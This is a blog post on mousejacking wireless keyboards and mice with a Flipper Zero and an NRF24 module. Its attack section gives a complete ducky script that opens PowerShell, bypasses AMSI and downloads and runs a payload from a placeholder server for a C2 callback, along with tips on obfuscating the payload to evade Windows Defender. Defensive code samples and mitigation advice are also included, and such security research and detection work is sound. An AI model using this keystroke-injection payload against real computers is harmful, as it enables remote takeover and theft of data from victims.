Mousejacking With A Flipper Zero
In this blog post, we will discuss the wireless attack called mousejacking and how to protect yourself from it. We will specifically focus on using a Flipper Zero device to test and later explain how to defend against mousejacking attacks.
What’s mousejacking?
MouseJack is a class of vulnerabilities that affects the vast majority of wireless, non-Bluetooth keyboards and mice. The attack was announced by Bastille in 2016. These peripherals are ‘connected’ to a host computer through a radio transceiver, commonly a small USB dongle. Since the connection is wireless, and mouse movements and keystrokes are sent over the air, it is possible to compromise a victim’s computer by transmitting specially crafted radio signals from a device that costs as little as $15, or from a different one that costs up to $40.
An attacker can launch the attack from up to 100 meters away. The attacker is able to take control of the target computer, without physically being in front of it, and type arbitrary text or send scripted commands. It is therefore possible to perform malicious activities without being detected.
The MouseJack exploit centers on injecting unencrypted keystrokes into a target computer. Mouse movements are usually sent unencrypted, while keystrokes are often encrypted (to prevent eavesdropping on what is being typed). However, the MouseJack vulnerability takes advantage of affected receiver dongles and their associated software, which allow unencrypted keystrokes transmitted by an attacker to be passed on to the computer’s operating system as if the victim had legitimately typed them.
Technical overview
Wireless mice and keyboards commonly communicate using proprietary protocols operating in the 2.4GHz ISM band. In contrast to Bluetooth, there is no industry standard to follow, leaving each vendor to implement its own security scheme.
Wireless mice and keyboards work by transmitting radio frequency packets to a USB dongle plugged into a user’s computer. When a user presses a key on their keyboard or moves their mouse, information describing the action is sent wirelessly to the USB dongle.
The dongle listens for radio frequency packets sent by the mouse or keyboard, and notifies the computer whenever the user moves their mouse or types on their keyboard.
In order to prevent eavesdropping, most vendors encrypt the data being transmitted by wireless keyboards. The dongle knows the encryption key being used by the keyboard, so it is able to decrypt the data and see what key was pressed. Without knowing the encryption key, an attacker is unable to decrypt the data, so they are unable to see what is being typed.
Conversely, none of the mice tested by Bastille encrypt their wireless communications. This means there is no authentication mechanism, and the dongle is unable to distinguish between packets transmitted by a mouse and those transmitted by an attacker. As a result, an attacker is able to pretend to be a mouse and transmit their own movement/click packets to a dongle.
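The point of the two paragraphs above is that encryption alone does not stop injection: what the dongle lacks is a way to verify that a packet came from the paired peripheral. The following added example (not code from the original post, and not any vendor's real protocol) models two dongle designs in Python. The first accepts any packet carrying the paired 5-byte address, as Bastille describes; the second requires an HMAC tag computed with a shared pairing key plus a monotonically increasing counter, and so rejects both a spoofed packet and a replayed genuine one. The address, key and packet layout are constructed for the demonstration.

```python
import hmac
import hashlib
import struct

# Constructed demo values: a 5-byte radio address and a shared pairing key.
# Neither comes from a real vendor protocol; the packet layout is illustrative.
PAIRED_ADDR = bytes.fromhex("a1b2c3d4e5")
DEMO_KEY = b"constructed-demo-pairing-key"
TAG_LEN = 16  # truncated HMAC-SHA256 tag appended to each packet


class UnauthenticatedDongle:
    """Models the MouseJack weakness: any packet that carries the paired
    address is accepted, so the dongle cannot tell the mouse from a spoofer."""

    def __init__(self, paired_addr: bytes):
        self.paired_addr = paired_addr
        self.accepted = []

    def receive(self, packet: bytes) -> bool:
        addr, payload = packet[:5], packet[5:]
        if addr != self.paired_addr:
            return False
        self.accepted.append(payload)
        return True


def build_authenticated_packet(addr: bytes, counter: int, payload: bytes, key: bytes) -> bytes:
    """Peripheral side of the hardened design: addr || counter || payload || tag.
    The tag proves knowledge of the pairing key; the counter defeats replay."""
    header = addr + struct.pack(">I", counter)
    tag = hmac.new(key, header + payload, hashlib.sha256).digest()[:TAG_LEN]
    return header + payload + tag


class AuthenticatedDongle:
    """Hardened model: rejects packets whose tag does not verify or whose
    counter is not strictly newer than the last accepted one."""

    def __init__(self, paired_addr: bytes, key: bytes):
        self.paired_addr = paired_addr
        self.key = key
        self.last_counter = -1
        self.accepted = []

    def receive(self, packet: bytes) -> bool:
        if len(packet) < 5 + 4 + TAG_LEN:
            return False
        addr = packet[:5]
        counter = struct.unpack(">I", packet[5:9])[0]
        payload, tag = packet[9:-TAG_LEN], packet[-TAG_LEN:]
        if addr != self.paired_addr:
            return False
        expected = hmac.new(self.key, packet[:9] + payload, hashlib.sha256).digest()[:TAG_LEN]
        if not hmac.compare_digest(tag, expected):
            return False  # forged or tampered: sender did not know the key
        if counter <= self.last_counter:
            return False  # replay of an earlier genuine packet
        self.last_counter = counter
        self.accepted.append(payload)
        return True


def run_scenarios() -> dict:
    """Feed the same three packets to both dongle models and record
    (accepted_by_unauthenticated, accepted_by_authenticated) for each."""
    weak = UnauthenticatedDongle(PAIRED_ADDR)
    strong = AuthenticatedDongle(PAIRED_ADDR, DEMO_KEY)

    # 1. Genuine report from the paired peripheral (constructed payload bytes).
    genuine = build_authenticated_packet(PAIRED_ADDR, 1, b"\x01\x00\x05", DEMO_KEY)
    # 2. A third party that learned the address over the air but not the key.
    spoofed = PAIRED_ADDR + struct.pack(">I", 2) + b"\x02\x00\x00" + bytes(TAG_LEN)
    # 3. The genuine packet captured and transmitted a second time.
    replayed = genuine

    results = {}
    for name, pkt in (("genuine", genuine), ("spoofed", spoofed), ("replayed", replayed)):
        results[name] = (weak.receive(pkt), strong.receive(pkt))
    return results


if __name__ == "__main__":
    for name, (weak_ok, strong_ok) in run_scenarios().items():
        print(f"{name:9s} unauthenticated={weak_ok} authenticated={strong_ok}")
```

The unauthenticated model accepts all three packets, which is exactly the property the attack relies on; the authenticated model accepts only the genuine packet. A real design would use authenticated encryption rather than a bare MAC, but the separation between confidentiality (what keyboard encryption gives you) and authenticity (what neither the tested mice nor the affected dongles enforce) is the same.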
Anatomy of the attack
First, the attacker identifies a target wireless mouse or keyboard by listening for RF packets transmitted when a user is moving/clicking the mouse or typing on the keyboard.
Finally, the attacker transmits keypress packets to type a series of commands into the victim’s computer. This can include downloading a virus or rootkit, transferring files off of the victim’s computer, or anything else the attacker could do if they were physically typing on the computer’s keyboard.
Testing setup
The test setup was an up-to-date Windows 11 laptop with a Logitech USB Unifying receiver, a Logitech M210 mouse and a Logitech K260 keyboard. To carry out the attack, a Flipper Zero with a Dr.B0rk NRF24 Flipper Zero v2 board, an EByte NRF24 module and a high-gain antenna connected via the GPIO pins was used. The firmware on the Flipper Zero was a fork of the Unleashed firmware from DarkFlippers, because the scripts needed to operate the NRF24 wireless module via the GPIO pins are readily available there.
The whole setup is shown below: the Flipper Zero on the left with the NRF24 module installed, the HP laptop connected to Havoc C2, and the Asus laptop (the target) in the middle with the Logitech USB Unifying receiver, mouse and keyboard connected.
To begin the attack, we first have to sniff for RF packets transmitted when a user is moving/clicking the mouse or typing on the keyboard. We do this using the NRF24 Sniffer fap (Flipper Zero application) under Applications > GPIO > NRF24 Sniffer.
Press Enter and change the settings to scan channels; switch between modes/channels using the buttons. Once this is set, wait for keystrokes or mouse movement. When a valid address is found it is saved on the Flipper for later mousejacking.
When a valid address is found you will see it as shown below:
We can now exit the Sniffer app and proceed to the NRF24 Mouse Jacker application [Applications > GPIO > NRF24 Mouse Jacker] to attack the PC. The captured address appears in an addresses.txt file in the Mouse Jacker application.
The captured address is listed below, and to attack it we need to browse to a ducky script.
A ducky script can be written offline and copied to the Flipper Zero. The ducky script I want to use will include an AMSI bypass and use Invoke-Assembly to load a malicious EXE and get a callback to our Havoc C2 instance.
REM Author: n0n5m1l3
REM Description: Bypass AMSI and Loads Assembly in Memory
REM Version: 1.0
REM Category: Execution
REM Target: All Windows
DELAY 500
GUI d
DELAY 500
GUI r
DELAY 500
STRING powershell.exe
ENTER
DELAY 2000
STRING IEX([Net.Webclient]::new().DownloadString('http://PAYLOAD-SERVER-IP/amsibypass.txt'));
ENTER
DELAY 2000
STRING IEX([Net.Webclient]::new().DownloadString('http://PAYLOAD-SERVER-IP/Invoke-LoadAssembly.md'));
ENTER
DELAY 2000
STRING Invoke-LoadAssembly -AssemblyUrl http://PAYLOAD-SERVER-IP/Payload.exe -Command ''
ENTER
DELAY 2000
GUI d
The above ducky script requires a working AMSI bypass, the Invoke-Assembly script renamed from the .ps1 extension to .md, and the assembly to be loaded.
The assembly or EXE file should be obfuscated so as not to alert Windows Defender, and better still if it has process injection capabilities. My assembly didn’t have process injection, but it bypassed Windows Defender.
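From a defender's side, the script above leaves a recognisable host trail: a PowerShell console launched interactively from the desktop shell (the Run dialog is opened from explorer.exe), followed by script blocks that fetch and evaluate remote content with IEX and DownloadString. The following added example (not code from the original post) runs two detection rules over constructed log lines and correlates them per user. The key=value event shape, field names and sample users are modelled loosely on Sysmon Event ID 1 (process creation) and PowerShell Event ID 4104 (script block logging), not on real log exports; the PAYLOAD-SERVER-IP placeholder is the one used in the post.

```python
import re

# Constructed sample events. Field names mirror Sysmon EID 1 and PowerShell EID
# 4104 loosely; the lines are hand-written for this example, not real exports.
SAMPLE_EVENTS = [
    r'EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'ParentImage=C:\Windows\explorer.exe CommandLine="powershell.exe" User=CORP\alice',
    r'''EventID=4104 ScriptBlockText="IEX([Net.Webclient]::new().DownloadString('http://PAYLOAD-SERVER-IP/amsibypass.txt'))" User=CORP\alice''',
    r'EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'ParentImage="C:\Program Files\VSCode\Code.exe" CommandLine="powershell.exe -NoLogo" User=CORP\bob',
    r'EventID=4104 ScriptBlockText="Get-ChildItem C:\Users\bob\Documents" User=CORP\bob',
    r'EventID=1 Image=C:\Windows\System32\notepad.exe ParentImage=C:\Windows\explorer.exe CommandLine="notepad.exe" User=CORP\carol',
]

# key=value pairs; values may be double-quoted when they contain spaces.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# Remote fetch-and-evaluate pattern seen in the post's ducky script.
SUSPICIOUS_SCRIPT = re.compile(r"(?i)(IEX|Invoke-Expression)\b.*(DownloadString|Net\.WebClient)")
SHELL_HOSTS = {"powershell.exe", "pwsh.exe"}


def parse_event(line: str) -> dict:
    """Turn one key=value line into a dict, honouring quoted values."""
    return {
        m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
        for m in KV_RE.finditer(line)
    }


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(lines) -> list:
    """Apply both rules to each event; return a list of alert dicts."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        eid = ev.get("EventID")
        if (eid == "1"
                and basename(ev.get("Image", "")) in SHELL_HOSTS
                and basename(ev.get("ParentImage", "")) == "explorer.exe"):
            # Interactive PowerShell started from the desktop shell (Run dialog,
            # Start menu). Noisy on its own, so rated medium.
            alerts.append({"rule": "shell-launched-powershell", "severity": "medium",
                           "user": ev.get("User")})
        elif eid == "4104" and SUSPICIOUS_SCRIPT.search(ev.get("ScriptBlockText", "")):
            alerts.append({"rule": "remote-script-download-and-eval", "severity": "high",
                           "user": ev.get("User")})
    return alerts


def correlate(alerts) -> set:
    """Users for whom both rules fired: the sequence the ducky script produces."""
    by_user = {}
    for a in alerts:
        by_user.setdefault(a["user"], set()).add(a["rule"])
    return {u for u, rules in by_user.items()
            if {"shell-launched-powershell", "remote-script-download-and-eval"} <= rules}


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for a in found:
        print(a)
    print("keystroke-injection pattern for:", correlate(found))
```

On the sample data only CORP\alice trips both rules; bob's PowerShell session comes from an editor and runs a benign script block, and carol's explorer-launched process is not a shell host. In a real deployment the correlation window would be bounded in time (the post's demo completes in a couple of seconds), and script block logging must be enabled on the endpoints for the 4104 rule to have anything to read.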
Demo of attack in action
Items used
Flipper Zero – $169 – https://shop.flipperzero.one/ [BEWARE OF SCAMMY SITES PURPORTING TO BE SELLING THE FLIPPER ZERO]
Dr.B0rk NRF24 Flipper Zero v2 board with EByte NRF24 module and a high gain antenna – $34 – https://www.tindie.com/products/tehrabbitt/flipper-zero-drb0rk-nrf24-v2/
What is the risk of this attack?
From the above demo, we can see that it takes only a couple of seconds to run the malicious commands and get a callback to our C2 (Command & Control) instance.
Once an attacker gets this callback, they can remotely run more malicious commands and move through the organization if an AD network is set up. They can also download sensitive files, set up persistence, maintain access for long periods, and clean up the traces of their mousejacking initial access.
This attack can be carried out from up to 100m away, and the portability of the Flipper makes identifying a potential attacker a challenge.
High-risk areas include libraries, public cafes and shared co-working spaces.
Mitigation
There are two basic types of nRF24L chips used by keyboards, mice and dongles: one-time-programmable, and flash memory. One-time-programmable devices cannot be updated once they leave the factory, but flash memory devices can.
For non-updatable devices, which represent the majority of those tested by Bastille’s researchers, there is no mechanism to secure a vulnerable device short of unplugging the USB dongle from the computer.
For devices with updated firmware available from the manufacturer, it is recommended to install the update before continuing to use the affected mouse or keyboard.
One can also use a wired keyboard or mouse if they’re as paranoid as I am.
Which devices are affected?
Most old USB receiver dongles are affected; the talented researchers at Bastille, on whose shoulders I stood, have listed the affected devices here (see the first link in the References).
References
https://www.bastille.net/research/vulnerabilities/mousejack/affected-devices
https://www.bastille.net/research/vulnerabilities/mousejack
https://www.bastille.net/research/vulnerabilities/mousejack/technical-details
https://github.com/RogueMaster/flipperzero-firmware-wPlugins/blob/420/documentation/NRF24.md
Donations
If this was helpful you can donate below so that I can buy a HackRF with a PortaPack.
BTC: bc1qwnsyyr5ttg7ktfqcmxgfe3sjelhy79z3r6cp4j
ETH: 0xB927fa9E84bd8BA9b06A8615b600D1AFC13d4824
XMR: 46CGeEhuDnqciAvV6BgptGg1d8XeKSV5hMfoPR6z5vsj9H1wZmEjqyBR2QiQXusY8USsmYb1LchrQEsTvuuBUC9YCnAmbi3